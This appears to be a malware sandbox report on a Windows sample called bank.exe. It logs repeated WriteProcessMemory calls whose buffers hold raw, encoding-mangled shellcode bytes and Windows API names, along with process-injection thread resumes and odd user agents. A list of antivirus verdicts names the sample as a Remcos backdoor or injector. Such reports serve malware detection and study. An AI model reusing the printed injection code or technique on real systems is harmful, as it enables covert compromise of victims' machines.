WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00110000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: OpenMutexA base_address: 0x001c0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x001d0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu base_address: 0x001e0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x001f0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Process32NextW base_address: 0x00240000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00290000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu)$ base_address: 0x002a0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x002f0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: LoadLibraryA base_address: 0x00300000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00310000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu10 base_address: 0x00320000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00330000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Process32FirstW base_address: 0x00340000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00350000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu54 base_address: 0x00360000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00370000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: GetProcAddress base_address: 0x00380000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00390000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsu98 base_address: 0x003e0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x003f0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: VirtualProtect base_address: 0x00400000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00410000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuA@ base_address: 0x00420000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00430000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: SetLastError base_address: 0x00440000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00450000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuED base_address: 0x00460000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00470000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: VirtualFree base_address: 0x00480000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00490000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuIH base_address: 0x004a0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x004b0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: VirtualAlloc base_address: 0x004c0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x004d0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuML base_address: 0x004e0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x004f0000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: GetNativeSystemInfo base_address: 0x00500000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00510000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuQP base_address: 0x00520000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00530000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: HeapAlloc base_address: 0x00540000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: KERNEL32.dll base_address: 0x00550000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: Õ?w"suEsuUT base_address: 0x00560000 process_identifier: 492 process_handle: 0x00000520	1	1	0
WriteProcessMemory Aug. 10, 2021, 5:42 p.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄIqhØIqèEÿÿPèGÿÿEèhèIqhØIqè-ÿÿPè/ÿÿEähøIqhØIqèÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐHqÃè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00570000 process_identifier: 492 process_handle: 0x00000520	1	1	0

Network activity contains more than one unique useragent (2 events)

process	bank.exe				useragent	zipo
process	bank.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3648 resumed a thread in remote process 3716
Process injection	Process 4020 resumed a thread in remote process 4080
NtResumeThread Aug. 10, 2021, 5:42 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3716	1	0	0
NtResumeThread Aug. 10, 2021, 5:43 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 4080	1	0	0

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Androm.m!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
McAfee	GenericRXAA-AA!E92CB564767A
Alibaba	Trojan:Win32/Injector.969954fb
Cyren	W32/Trojan.NKGT-5041
ESET-NOD32	a variant of Win32/Injector.EPXQ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.Win32.Remcos.gen
BitDefender	Trojan.GenericKD.46766284
MicroWorld-eScan	Trojan.GenericKD.46766284
Avast	Win32:RATX-gen [Trj]
Ad-Aware	Trojan.GenericKD.46766284
Sophos	Mal/Generic-S
DrWeb	Trojan.DownLoader41.8746
McAfee-GW-Edition	BehavesLike.Win32.AdwareDealPly.bh
FireEye	Generic.mg.e92cb564767afb2d
Emsisoft	Trojan.GenericKD.46766284 (B)
Ikarus	Win32.Outbreak
GData	Trojan.GenericKD.46766284
Arcabit	Trojan.Generic.D2C998CC
ZoneAlarm	HEUR:Backdoor.Win32.Remcos.gen
Microsoft	Trojan:Win32/Fareit!ml
AhnLab-V3	Malware/Win.Generic.C4585907
MAX	malware (ai score=82)
Malwarebytes	Backdoor.Remcos
TrendMicro-HouseCall	TROJ_GEN.R002H0DHA21
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_87%
Fortinet	W32/Kryptik.EPXQ!tr
AVG	Win32:RATX-gen [Trj]
CrowdStrike	win/malicious_confidence_60% (W)

bank.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All